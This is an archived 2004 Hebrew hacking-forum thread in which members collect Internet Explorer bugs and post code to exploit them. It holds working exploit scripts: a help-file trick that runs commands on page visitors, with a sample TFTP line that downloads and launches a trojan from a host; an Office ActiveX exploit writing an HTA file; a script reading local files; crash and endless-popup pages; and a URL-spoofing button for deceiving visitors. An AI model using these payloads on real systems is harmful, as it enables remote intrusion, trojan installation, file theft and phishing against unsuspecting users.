ארכיון רד-בורד: באגים בדפדפן IE- כל הגירסאות.

ראשי > אבטחת מידע > באגים בדפדפן IE- כל הגירסאות.

2004-05-21 12:06 cp77fk4r

אוקיי, אז כמו שאמרתי, אני אפתח מדי פעם אשכולות על ישומים מסויימים, וכל אחד יכתוב את הבאגים שהוא מכיר ואת דרך ניצולם (נחמד עם תיהיה יצירתיים).

הנושא הראשון - הדפדפן של מייקרוסופט, Internet Explorer.

תהנו.

2004-05-21 12:21 cp77fk4r

בעזרת הסקריפט הזה:

<script>
prog = 'cmd'
args = ["&" הפקודה, אם יש כמה פקודות תפרידו אותם בעזרת התו ];

if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascript :location.replace('mk:@MSITStore:C:')");
setTimeout('run()',1000);
}
function run() {
f("javascript :document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=","+prog+","+args+""></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript :c1.Click();c2.Click();");
close();
}
</script>

היה אפשר לעריץ פקודות מרחוק על כל מי שהיה נכנס לעמוד והדפדפן היה מריץ אותם בלי לחשוב פעמים, למשל בעזרת הפקודה TFTP היה אפשר להוריד טרויאן למחשב ובעזרת הפקודה Run/Start/Call לעריץ אותו, וככה לקבל גישה מלאה למחשב ע"י עמוד HTML תמים.

למשל:

Tftp -i [Host] get [Trojan.exe] [c:windowssystem32] & Run c:windowssystem32Trojan.exe;

הבאג התגלה ע"י Andreas Sandblad.

[נערך על-ידי cp77fk4r בתאריך 2004/05/21 12:23]

2004-05-21 12:27 cp77fk4r

בעזרת השורת קוד:

<html>
<form>
<input type Crash>
</form>
</html>

הדפדפן היה פשוט קורס מעומס.

(אפשר להחליף את הCrash בכל מחרוזת אחרת שהIE לא מכיר).

הבאג התגלה מזמן ע"י Saludos.

2004-05-21 12:29 cp77fk4r

גם בעזרת השורת קוד הזאת:

<html>
<body>
<style type="text/css">
#three {
position: absolute;
}
#one #two {
position: absolute;
}
</style>
<div id="one">
In 'one'
<span id="two">
In 'two'
</div>
<div id="three">
In 'three'
</div>
</body>

היה אפשר להקריס את הדפדפן בקלות רבה.

הבאג התגלה ע"י Nick Johnson.

2004-05-21 12:38 cp77fk4r

עוד באג נחמד התגלה לפני כמה זמן, הפעם ע"י Georgi Guninski.

הבאג היה שילוב בין IE לבין ישומים מהOffice (נו.. גם של מיקרוסופט).
ניצול של הבאג היה מאפשר לעריץ אובייקטים של ActiveX גם כשהוא היה לא חסום.

כדי לשלב את הבאג עם Excel 2000, PowerPoint 2000 או Access 2000:

<object data="[bla.xla]" id="sh1" width=0 height=0>
</object>
<SCRIPT>
function f()
{
fn="C:\\georgi-xla.hta";
sh1.object.SaveAs(fn,6);
/*sh1.object.SaveAs("C:\\windows\\Start
Menu\\Programs\\StartUp\\georgi-xla.hta",6);*/
alert(fn+" sucessfully written");
}
setTimeout("f()",5000);
</SCRIPT>

בשביל לנצל את הבאג ע"י שימוש באובייקטים של Access 2000 לבד:

<OBJECT data="db3.mdb" id="d1"></OBJECT>
Private Sub Form_Load()
On Error GoTo Err_Command0_Click
Dim stAppName As String
stAppName = "C:\Program Files\Accessories\wordpad.exe"
MsgBox ("Trying to start: " & stAppName)
Call Shell(stAppName, 1)

Exit_Command0_Click:
Exit Sub

Err_Command0_Click:
MsgBox Err.Description
Resume Exit_Command0_Click
End Sub

2004-05-21 12:46 CooLMaN

A link that may come in handy:

click here
[נערך על-ידי CooLMaN בתאריך 2004/05/21 12:50]

2004-05-21 13:08 cp77fk4r

תודה על הלינק CooLMaN, אבל אני מבקש שמעכשיו תסבירו עליהם אישית, אני מתכוון כמו שאני עשיתי עד עכשיו.

תודה.

2004-05-21 14:18 11010010110

עמוד שמעלה את עצמו כל פעם שהוא נפתח (לא מכיר איך מתחברים דבר כזה) יתקע ת-IE ואולי את כל המחשב

2004-05-21 15:56 cp77fk4r

פשוט תעלה עמוד לאיזה שרת בשם:

1.html

ותכתוב בו ככה:

<HTML>
< BODY onload;;;;; = window . open ( ' 1 . html ' ) >

כל מי שיכנס לעמוד הזה זה יפנה אותו לעמוד שיהיה כיביכול חדש אך יהיה באמת אותו עמוד, ואז הוא יריץ את הקוד בעמוד ה"חדש" ויפתח את עצמו שוב פעם, וככה בלי סוף.

עריכה:
אררג... המערכת הורסת את הקוד, אני מקווה שעכשיו זה יוצג טוב.

עריכה בפעם השביעית בערך:
טוב, לא משנה, אני נכנע, שהקוד ישאר ככה.. אני מקווה שזה יובן.

[נערך על-ידי silicon_wolf בתאריך 2004/05/21 16:14]

2004-05-21 16:13 cp77fk4r

באג שמאפשר לעשות "ספוף" לURL, היית חושב שאתה באתר מסויים אך אתה צופה בדף אחר, פשוט היו כותבים את כתובת האתר, ואז את התווים"%01" ו-"@" ואז את הכתובת של האתר שאליו אתם רוצים לשלוח את הצופה, לדוגמא:

http://www.microsoft.com%01@www.red-board.co.il

כדי להסתיר את זה, אפשר להשתמש בכפתור או משהו כזה, כדי שלא יראו את השורת כתובת, למשל עם השורת קוד הזאת:

<button onclick="location.href=unescape(http://www.microsoft.com%01@www.red-board.co.il);" style="font: 8pt verdana, sans-serif;">
www.microsoft.com
</button>

(הבאג היה בIE5 ובIE6, אבל יצא עידכון לפני כמה זמן)[נערך על-ידי cp77fk4r בתאריך 2004/05/21 16:15]

2004-05-23 13:16 cp77fk4r

עמוד שמסקר הרבה באגים שקיימים בישום IE, מומלץ.

http://www.safecenter.net/UMBRELLAWEBV4/ie_unpatched

2004-05-25 03:24 cp77fk4r

קוד שמאפשר להריץ פקודות דוס על המערכת *אני אציין שהגישה שתיהיה לקוד היא תיהיה הגישה של המשתמש דרכו נכנסו לאותו העמוד*

<span id="oSpan"></span>
<script language="jscript" defer>
oSpan.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="[The Command]"></object>'
</script>

2004-05-25 03:31 cp77fk4r

קוד נחמד שמדגים רעיון יפה על איך אפשר להשיג מידע מקבצי txt:

<SCRIPT>
alert("This page reads C:\\TEST.TXT\nYou may need to create it.");
function f1()
{
dh.DOM.all.I1.focus();
dh.DOM.all.I1.document.execCommand("selectall");
dh.DOM.all.I1.document.execCommand("copy");
r=document.all.S1.createTextRange();
r.execCommand("paste");
alert("Here is your file: "+S1.value);
}

function loadit()
{
dh.loadURL("[URL_of_FTP]");

setTimeout("f1()",5000);
}
setTimeout("loadit();",1000);
</SCRIPT>
---------------------------------------------------
---------ifr2.html---------------------------------
<HTML>
<IFRAME SRC="[URL_of_Local_File]" ID="I1" name="I1">
</IFRAME>
</HTML>
---------------------------------------------------

עמודים: 1